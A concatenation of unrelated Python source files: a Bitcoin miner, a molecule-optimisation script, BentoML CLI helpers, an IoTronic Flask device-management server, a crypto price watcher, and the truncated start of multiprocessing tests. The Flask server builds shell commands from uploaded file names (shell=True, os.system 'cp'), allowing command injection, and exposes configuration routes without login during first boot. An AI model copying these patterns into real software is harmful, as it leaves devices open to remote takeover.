hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 3471
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
stable_radical_opt.py
|
import argparse
import logging
import math
import os
import pathlib
from rlmolecule.sql.run_config import RunConfig
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
from stable_radical_problem import construct_problem
def run_games(run_config: RunConfig, **kwargs) -> None:
from rlmolecule.alphazero.alphazero import AlphaZero
config = run_config.mcts_config
game = AlphaZero(
construct_problem(run_config, **kwargs),
min_reward=config.get('min_reward', 0.0),
pb_c_base=config.get('pb_c_base', 1.0),
pb_c_init=config.get('pb_c_init', 1.25),
dirichlet_noise=config.get('dirichlet_noise', True),
dirichlet_alpha=config.get('dirichlet_alpha', 1.0),
dirichlet_x=config.get('dirichlet_x', 0.25),
# MCTS parameters
ucb_constant=config.get('ucb_constant', math.sqrt(2)),
)
while True:
path, reward = game.run(
num_mcts_samples=config.get('num_mcts_samples', 50),
timeout=config.get('timeout', None),
max_depth=config.get('max_depth', 1000000),
)
logger.info(f'Game Finished -- Reward {reward.raw_reward:.3f} -- Final state {path[-1][0]}')
def train_model(run_config: RunConfig, **kwargs) -> None:
config = run_config.train_config
construct_problem(run_config, **kwargs).train_policy_model(
steps_per_epoch=config.get('steps_per_epoch', 100),
lr=float(config.get('lr', 1E-3)),
epochs=int(float(config.get('epochs', 1E4))),
game_count_delay=config.get('game_count_delay', 20),
verbose=config.get('verbose', 2)
)
def setup_argparser():
parser = argparse.ArgumentParser(
description='Optimize stable radicals to work as both the anode and cathode of a redox-flow battery.')
parser.add_argument('--config', type=str, help='Configuration file')
parser.add_argument('--train-policy',
action="store_true",
default=False,
help='Train the policy model only (on GPUs)')
parser.add_argument('--rollout',
action="store_true",
default=False,
help='Run the game simulations only (on CPUs)')
# '/projects/rlmolecule/pstjohn/models/20210214_radical_stability_new_data/',
parser.add_argument('--stability-model',
'-S',
type=pathlib.Path,
required=True,
help='Radical stability model for computing the electron spin and buried volume')
# '/projects/rlmolecule/pstjohn/models/20210214_redox_new_data/',
parser.add_argument('--redox-model',
'-R',
type=pathlib.Path,
required=True,
help='Redox model for computing the ionization_energy and electron_affinity')
# '/projects/rlmolecule/pstjohn/models/20210216_bde_new_nfp/',
parser.add_argument('--bde-model',
'-B',
type=pathlib.Path,
required=True,
help='BDE model for computing the Bond Dissociation Energy')
return parser
if __name__ == "__main__":
parser = setup_argparser()
args = parser.parse_args()
kwargs = vars(args)
run_config = RunConfig(args.config)
if args.train_policy:
train_model(run_config, **kwargs)
elif args.rollout:
# make sure the rollouts do not use the GPU
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
run_games(run_config, **kwargs)
else:
print("Must specify either --train-policy or --rollout")
# else:
# jobs = [multiprocessing.Process(target=monitor)]
# jobs[0].start()
# time.sleep(1)
# for i in range(5):
# jobs += [multiprocessing.Process(target=run_games)]
# jobs += [multiprocessing.Process(target=train_model)]
# for job in jobs[1:]:
# job.start()
# for job in jobs:
# job.join(300)
|
utils.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import sys
import threading
import itertools
import time
import logging
from datetime import datetime
import humanfriendly
from google.protobuf.json_format import MessageToDict
from tabulate import tabulate
from bentoml.cli.click_utils import _echo
from bentoml.proto.deployment_pb2 import DeploymentState, DeploymentSpec
from bentoml.utils import pb_to_yaml
logger = logging.getLogger(__name__)
class Spinner:
def __init__(self, message, delay=0.1):
self.spinner = itertools.cycle(['-', '/', '|', '\\'])
self.delay = delay
self.busy = False
self._screen_lock = None
self.thread = None
self.spinner_visible = False
sys.stdout.write(message)
def write_next(self):
with self._screen_lock:
if not self.spinner_visible:
sys.stdout.write(next(self.spinner))
self.spinner_visible = True
sys.stdout.flush()
def remove_spinner(self, cleanup=False):
with self._screen_lock:
if self.spinner_visible:
sys.stdout.write('\b')
self.spinner_visible = False
if cleanup:
sys.stdout.write(' ') # overwrite spinner with blank
sys.stdout.write('\r') # move to next line
sys.stdout.flush()
def spinner_task(self):
while self.busy:
self.write_next()
time.sleep(self.delay)
self.remove_spinner()
def __enter__(self):
if sys.stdout.isatty():
self._screen_lock = threading.Lock()
self.busy = True
self.thread = threading.Thread(target=self.spinner_task)
self.thread.start()
def __exit__(self, exception, value, tb):
if sys.stdout.isatty():
self.busy = False
self.remove_spinner(cleanup=True)
else:
sys.stdout.write('\r')
def parse_key_value_pairs(key_value_pairs_str):
result = {}
if key_value_pairs_str:
for key_value_pair in key_value_pairs_str.split(','):
key, value = key_value_pair.split('=')
key = key.strip()
value = value.strip()
if key in result:
logger.warning("duplicated key '%s' found string map parameter", key)
result[key] = value
return result
def _print_deployment_info(deployment, output_type):
if output_type == 'yaml':
_echo(pb_to_yaml(deployment))
else:
deployment_info = MessageToDict(deployment)
if deployment_info['state']['infoJson']:
deployment_info['state']['infoJson'] = json.loads(
deployment_info['state']['infoJson']
)
_echo(json.dumps(deployment_info, indent=2, separators=(',', ': ')))
def _format_labels_for_print(labels):
if not labels:
return None
result = []
for label_key in labels:
result.append(
'{label_key}:{label_value}'.format(
label_key=label_key, label_value=labels[label_key]
)
)
return '\n'.join(result)
def _format_deployment_age_for_print(deployment_pb):
if not deployment_pb.created_at:
# deployments created before version 0.4.5 don't have created_at field,
# we will not show the age for those deployments
return None
else:
deployment_duration = datetime.utcnow() - deployment_pb.created_at.ToDatetime()
return humanfriendly.format_timespan(deployment_duration)
def _print_deployments_table(deployments):
table = []
headers = ['NAME', 'NAMESPACE', 'LABELS', 'PLATFORM', 'STATUS', 'AGE']
for deployment in deployments:
row = [
deployment.name,
deployment.namespace,
_format_labels_for_print(deployment.labels),
DeploymentSpec.DeploymentOperator.Name(deployment.spec.operator)
.lower()
.replace('_', '-'),
DeploymentState.State.Name(deployment.state.state)
.lower()
.replace('_', ' '),
_format_deployment_age_for_print(deployment),
]
table.append(row)
table_display = tabulate(table, headers, tablefmt='plain')
_echo(table_display)
def _print_deployments_info(deployments, output_type):
if output_type == 'table':
_print_deployments_table(deployments)
else:
for deployment in deployments:
_print_deployment_info(deployment, output_type)
|
rest_manager.py
|
# Copyright 2017 MDSLAB - University of Messina
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__author__ = "Nicola Peditto <n.peditto@gmail.com>"
from iotronic_lightningrod.common.pam import pamAuthentication
from iotronic_lightningrod.common import utils
from iotronic_lightningrod.lightningrod import board
from iotronic_lightningrod.lightningrod import iotronic_status
from iotronic_lightningrod.modules import device_manager
from iotronic_lightningrod.modules import Module
from iotronic_lightningrod.modules import service_manager
from iotronic_lightningrod.modules import utils as lr_utils
from datetime import datetime
from flask import Flask
from flask import redirect
from flask import render_template
from flask import request
from flask import send_file
from flask import session as f_session
from flask import url_for
from flask import abort
# from flask import Response
import os
import subprocess
import threading
from oslo_config import cfg
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class RestManager(Module.Module):
def __init__(self, board, session=None):
super(RestManager, self).__init__("RestManager", board)
def finalize(self):
threading.Thread(target=self._runRestServer, args=()).start()
def restore(self):
pass
def _runRestServer(self):
APP_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_PATH = os.path.join(APP_PATH, 'modules/web/templates/')
STATIC_PATH = os.path.join(APP_PATH, 'modules/web/static/')
app = Flask(
__name__,
template_folder=TEMPLATE_PATH,
static_folder=STATIC_PATH,
static_url_path="/static"
)
app.secret_key = os.urandom(24).hex() # to use flask session
UPLOAD_FOLDER = '/tmp'
ALLOWED_EXTENSIONS = set(['tar.gz', 'gz'])
ALLOWED_STTINGS_EXTENSIONS = set(['json'])
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.route('/')
def home():
if 'username' in f_session:
return render_template('home.html')
else:
return render_template('login.html')
def redirect_dest(fallback):
dest = request.args.get('next')
try:
dest_url = url_for(dest)
except Exception:
return redirect(fallback)
return redirect(dest_url)
@app.route('/login', methods=['GET', 'POST'])
def login():
error = None
if request.method == 'POST':
if pamAuthentication(
str(request.form['username']),
str(request.form['password'])
):
f_session['username'] = request.form['username']
return redirect_dest(fallback="/")
else:
error = 'Invalid Credentials. Please try again.'
if 'username' in f_session:
return render_template('home.html')
else:
return render_template('login.html', error=error)
@app.route('/logout')
def logout():
# remove the username from the session if it's there
f_session.pop('username', None)
return redirect("/login", code=302)
@app.route('/info')
def info():
wstun_status = service_manager.wstun_status()
if wstun_status == 0:
wstun_status = "Online"
else:
wstun_status = "Offline"
service_list = service_manager.services_list("list")
if service_list == "":
service_list = "no services exposed!"
lr_cty = "N/A"
from iotronic_lightningrod.lightningrod import wport
sock_bundle = lr_utils.get_socket_info(wport)
if sock_bundle != "N/A":
lr_cty = sock_bundle[2] + " - " + sock_bundle[0] \
+ " - " + sock_bundle[1]
webservice_list = []
nginx_path = "/etc/nginx/conf.d/"
if os.path.exists(nginx_path):
active_webservice_list = [f for f in os.listdir(nginx_path)
if os.path.isfile(os.path.join(nginx_path, f))]
if len(active_webservice_list) != 0:
for ws in active_webservice_list:
ws = ws.replace('.conf', '')
webservice_list.append(ws)
info = {
'board_id': board.uuid,
'board_name': board.name,
'wagent': board.agent,
'session_id': board.session_id,
'timestamp': str(
datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')),
'wstun_status': wstun_status,
'board_reg_status': str(board.status),
'iotronic_status': str(iotronic_status(board.status)),
'service_list': service_list,
'webservice_list': webservice_list,
'serial_dev': device_manager.getSerialDevice(),
'nic': lr_cty,
'lr_version': str(
utils.get_version("iotronic-lightningrod")
)
}
return info, 200
@app.route('/status')
def status():
try:
if ('username' in f_session):
f_session['status'] = str(board.status)
wstun_status = service_manager.wstun_status()
if wstun_status == 0:
wstun_status = "Online"
else:
wstun_status = "Offline"
service_list = service_manager.services_list("html")
if service_list == "":
service_list = "no services exposed!"
webservice_list = ""
nginx_path = "/etc/nginx/conf.d/"
if os.path.exists(nginx_path):
active_webservice_list = [
f for f in os.listdir(nginx_path)
if os.path.isfile(os.path.join(nginx_path, f))
]
for ws in active_webservice_list:
ws = ws.replace('.conf', '')[3:]
webservice_list = webservice_list + "\
<li>" + ws + "</li>"
else:
webservice_list = "no webservices exposed!"
if webservice_list == "":
webservice_list = "no webservices exposed!"
lr_cty = "N/A"
from iotronic_lightningrod.lightningrod import wport
sock_bundle = lr_utils.get_socket_info(wport)
if sock_bundle != "N/A":
lr_cty = sock_bundle[2] + " - " + sock_bundle[0] \
+ " - " + sock_bundle[1]
info = {
'board_id': board.uuid,
'board_name': board.name,
'wagent': board.agent,
'session_id': board.session_id,
'timestamp': str(
datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')),
'wstun_status': wstun_status,
'board_reg_status': str(board.status),
'iotronic_status': str(iotronic_status(board.status)),
'service_list': str(service_list),
'webservice_list': str(webservice_list),
'serial_dev': device_manager.getSerialDevice(),
'nic': lr_cty,
'lr_version': str(
utils.get_version("iotronic-lightningrod")
)
}
return render_template('status.html', **info)
else:
return redirect(url_for('login', next=request.endpoint))
except Exception as err:
LOG.error(err)
info = {
'messages': [str(err)]
}
return render_template('status.html', **info)
@app.route('/system')
def system():
if 'username' in f_session:
info = {
'board_status': board.status
}
return render_template('system.html', **info)
else:
return redirect(url_for('login', next=request.endpoint))
@app.route('/network')
def network():
if 'username' in f_session:
info = {
'ifconfig': device_manager.getIfconfig()
}
return render_template('network.html', **info)
else:
return redirect(url_for('login', next=request.endpoint))
def lr_config(ragent, code):
bashCommand = "lr_configure %s %s " % (code, ragent)
process = subprocess.Popen(bashCommand.split(),
stdout=subprocess.PIPE)
output, error = process.communicate()
return
def change_hostname(hostname):
if hostname != "":
bashCommand = "hostname %s " % (hostname)
process = subprocess.Popen(bashCommand.split(),
stdout=subprocess.PIPE)
output, error = process.communicate()
else:
print("- No hostname specified!")
return
def lr_install():
bashCommand = "lr_install"
process = subprocess.Popen(bashCommand.split(),
stdout=subprocess.PIPE)
output, error = process.communicate()
return
def identity_backup():
bashCommand = "device_bkp_rest backup --path /tmp "\
+ "| grep filename: |awk '{print $4}'"
process = subprocess.Popen(bashCommand,
stdout=subprocess.PIPE, shell=True)
output, error = process.communicate()
return output.decode('ascii').strip()
def identity_restore(filepath):
bashCommand = "device_bkp_rest restore " \
+ str(filepath) + "| tail -n 1"
process = subprocess.Popen(bashCommand,
stdout=subprocess.PIPE, shell=True)
output, error = process.communicate()
return output.decode('ascii').strip()
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def allowed_settings(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() \
in ALLOWED_STTINGS_EXTENSIONS
@app.route('/restore', methods=['GET', 'POST'])
def upload_file():
if ('username' in f_session) or str(board.status) == "first_boot":
f_session['status'] = str(board.status)
if request.form.get('dev_rst_btn') == 'Device restore':
if 'rst_file' not in request.files:
error = 'Identity restore result: No file uploaded!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
else:
file = request.files['rst_file']
if file.filename == '':
error = 'Identity restore result: No filename!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template('config.html', **info,
error=error)
else:
filename = file.filename
print("Identity file uploaded: " + str(filename))
if file and allowed_file(file.filename):
bpath = os.path.join(
app.config['UPLOAD_FOLDER'],
filename
)
bpath = bpath.replace(" ", "")
bpath = bpath.replace("(", "-")
bpath = bpath.replace(")", "-")
print("--> storage path: " + str(bpath))
file.save(bpath)
out_res = identity_restore(bpath)
print("--> restore result: " + str(out_res))
# restart LR
print("--> LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
else:
error = 'Identity restore result: ' \
+ 'file extention not allowed!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
# return redirect("/config", code=302)
else:
return redirect("/", code=302)
else:
return redirect(url_for('login', next=request.endpoint))
@app.route('/backup', methods=['GET'])
def backup_download():
# LOG.info(request.query_string)
# LOG.info(request.__dict__)
if 'username' in f_session:
print("Identity file downloading: ")
filename = identity_backup()
print("--> backup created:" + str(filename))
path = str(filename)
if path is None:
print("Error path None")
try:
print("--> backup file sent.")
return send_file(path, as_attachment=True)
except Exception as e:
print(e)
else:
return redirect(url_for('login', next=request.endpoint))
@app.route('/factory', methods=['GET'])
def factory_reset():
if 'username' in f_session:
print("Lightning-rod factory reset: ")
f_session['status'] = str(board.status)
# delete nginx conf.d files
os.system("rm /etc/nginx/conf.d/lr_*")
print("--> NGINX settings deleted.")
# delete letsencrypt
os.system("rm -r /etc/letsencrypt/*")
print("--> LetsEncrypt settings deleted.")
# delete var-iotronic
os.system("rm -r /var/lib/iotronic/*")
print("--> Iotronic data deleted.")
# delete etc-iotronic
os.system("rm -r /etc/iotronic/*")
print("--> Iotronic settings deleted.")
# exec lr_install
lr_install()
# restart LR
print("--> LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
else:
return redirect(url_for('login', next=request.endpoint))
@app.route('/config', methods=['GET', 'POST'])
def config():
if ('username' in f_session) or str(board.status) == "first_boot":
f_session['status'] = str(board.status)
if request.method == 'POST':
req_body = request.get_json()
LOG.debug(req_body)
if req_body != None:
if 'action' in req_body:
if req_body['action'] == "configure":
LOG.info("API LR configuration")
ragent = req_body['urlwagent']
code = req_body['code']
lr_config(ragent, code)
if 'hostname' in req_body:
if req_body['hostname'] != "":
change_hostname(req_body['hostname'])
return {"result": "LR configured, \
authenticating..."}, 200
else:
abort(400)
elif request.form.get('reg_btn') == 'CONFIGURE':
ragent = request.form['urlwagent']
code = request.form['code']
lr_config(ragent, code)
hostname = request.form['hostname']
change_hostname(hostname)
return redirect("/status", code=302)
elif request.form.get('rst_btn') == 'RESTORE':
utils.restoreConf()
print("Restored")
f_session['status'] = "restarting"
return redirect("/", code=302)
elif request.form.get('fct_btn'):
utils.restoreFactoryConf()
print("Refactored")
print("--> LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
elif request.form.get('change_hostname'):
hostname = request.form['hostname']
change_hostname(hostname)
return redirect("/system", code=302)
elif request.form.get('rst_settings_btn'):
print("Settings restoring from uploaded backup...")
if len(request.files) != 0:
if 'rst_settings_file' in request.files:
file = request.files['rst_settings_file']
if file.filename == '':
error = 'Settings restore result: ' \
+ 'No filename!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
else:
filename = file.filename
print(" - file uploaded: " + str(filename))
if file and allowed_settings(filename):
bpath = os.path.join(
app.config['UPLOAD_FOLDER'],
filename
)
file.save(bpath)
try:
os.system(
'cp '
+ bpath
+ ' /etc/iotronic/'
+ 'settings.json'
)
except Exception as e:
LOG.warning(
"Error restoring " +
"configuration " + str(e))
print(" - done!")
if board.status == "first_boot":
# start LR
print(" - LR starting "
+ "in 5 seconds...")
f_session['status'] = "starting"
else:
# restart LR
print(" - LR restarting "
+ "in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
else:
error = 'Wrong file extention: ' \
+ str(filename)
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
else:
error = 'input form error!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template('config.html', **info,
error=error)
else:
error = "no settings file specified!"
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
return redirect("/config", code=302)
else:
print("Error POST request")
return redirect("/status", code=302)
else:
if board.status == "first_boot":
urlwagent = request.args.get('urlwagent') or ""
code = request.args.get('code') or ""
info = {
'urlwagent': urlwagent,
'code': code,
'board_status': board.status
}
return render_template('config.html', **info)
else:
if request.args.get('bkp_btn'):
# utils.backupConf()
print("Settings file downloading: ")
path = "/etc/iotronic/settings.json"
if path is None:
print("Error path None")
return redirect("/config", code=500)
try:
fn_download = "settings_" + str(
datetime.now().strftime(
'%Y-%m-%dT%H:%M:%S.%f')) + ".json"
print("--> backup settings file sent.")
return send_file(
path,
as_attachment=True,
attachment_filename=fn_download
)
except Exception as e:
print(e)
return redirect("/config", code=500)
elif request.args.get('rst_btn'):
utils.restoreConf()
print("Restored")
return redirect("/config", code=302)
elif request.args.get('fct_btn'):
utils.restoreFactoryConf()
print("Refactored")
print("--> LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
elif request.args.get('lr_restart_btn'):
print("LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
else:
info = {
'board_status': board.status
}
return render_template('config.html', **info)
else:
if request.method == 'POST':
req_body = request.get_json()
if req_body != None and str(board.status) != "first_boot":
return {"result": "LR already configured!"}, 403
return redirect(url_for('login', next=request.endpoint))
app.run(host='0.0.0.0', port=1474, debug=False, use_reloader=False)
|
altwatcher.py
|
#!/usr/bin/env python
# NOTE: Python 3 6 is required
import curses, datetime, coinmarketcap, pickle, sys, threading, time, traceback
from collections import defaultdict
cmc = coinmarketcap.Market()
histories = defaultdict(list) # A map of form: "CUR1/CUR2": [CONVERSION...]
histfile = "/tmp/cmchistory.pickle"
last, updated = datetime.datetime.now(), []
pairs = (
"bitcoin/ethereum",
"bitcoin/litecoin",
"ethereum/litecoin",
"nano/decred",
)
def tick(c1, c2):
ct1 = cmc.ticker(c1)[0]
ct2 = cmc.ticker(c2)[0]
forward = float(ct1["price_usd"]) / float(ct2["price_usd"])
timestamp = datetime.datetime.fromtimestamp(int(ct1["last_updated"]))
ticker = f"{c1}/{c2}"
# Only add changed values.
try:
if str(forward) == str(histories[ticker][-1][1]):
return
except IndexError:
pass
global updated
updated.append(ticker)
histories[ticker].append((timestamp, forward))
def do_tick(event):
sleeptime = 30
sleep = 0
while not event.wait(1):
# Loop with a more fine-grained interrupt schedule.
if sleep > 0:
sleep -= 1
time.sleep(1)
continue
sleep = sleeptime
# Update the price histories.
last = datetime.datetime.now()
try:
for pair in pairs:
tick(*pair.split("/"))
except:
# Don't spit out errors.
pass
# GUI Rendering.
def render_boxes(screen, my, mx, reverse):
pair_count = len(pairs)
box_height = my // pair_count
for i, pair in enumerate(pairs):
ystart = box_height * i
win = curses.newwin(box_height, mx, ystart, 0)
win.addstr(0, 0, "-" * mx)
win.addstr(1, 0, pair.center(mx))
try:
prices = [1 / h[1] if reverse else h[1]
for h in histories[pair]]
data = (" " * 4).join([
f"{min(prices)}",
f"{sum(prices) / len(prices)}",
f"{max(prices)}",
]).center(mx)
prices = [h[1] if reverse else 1 / h[1]
for h in histories[pair]]
rdata = (" " * 4).join([
f"{max(prices)}",
f"{sum(prices) / len(prices)}",
f"{min(prices)}",
]).center(mx)
if pair in updated:
win.addstr(2, 0, data, curses.A_BOLD)
win.addstr(3, 0, rdata, curses.A_BOLD)
else:
win.addstr(2, 0, data)
win.addstr(3, 0, rdata)
except (IndexError, ValueError):
pass
win.addstr(4, 0, "-" * mx)
first_row = 5
for i in range(first_row, box_height):
try:
timestamp, forward = histories[pair][-(i - (first_row - 1))]
data = (" " * 4).join([
f"{timestamp}",
f"{forward}",
f"{1 / forward}",
]).center(mx - 1)
if pair in updated and i == first_row:
win.addstr(i, 0, data, curses.A_BOLD)
else:
win.addstr(i, 0, data)
except IndexError:
break
win.refresh()
def main(screen):
screen.nodelay(True)
reverse = True
while True:
key = screen.getch()
if key == ord("r"):
reverse = not reverse
elif key == ord("q"):
break
render_boxes(screen, *screen.getmaxyx(), reverse)
updated.clear()
screen.refresh()
time.sleep(1)
if __name__ == "__main__":
print("Loading Data")
try:
with open(histfile, "rb") as cmchistory:
histories = pickle.load(cmchistory)
except:
print("Failed to Load Data")
event = threading.Event()
thr = threading.Thread(target=do_tick, args=(event,))
thr.start()
try:
curses.wrapper(main)
except KeyboardInterrupt:
pass
finally:
event.set()
thr.join()
print("Saving Data")
with open(histfile, "wb") as cmchistory:
pickle.dump(histories, cmchistory)
|
test_multiprocessing.py
|
#!/usr/bin/env python
#
# Unit tests for the multiprocessing package
#
import unittest
import Queue
import time
import sys
import os
import gc
import signal
import array
import socket
import random
import logging
from test import test_support
from StringIO import StringIO
_multiprocessing = test_support.import_module('_multiprocessing')
# import threading after _multiprocessing to raise a more revelant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
# Work around broken sem_open implementations
test_support.import_module('multiprocessing.synchronize')
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
#
#
#
latin = str
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
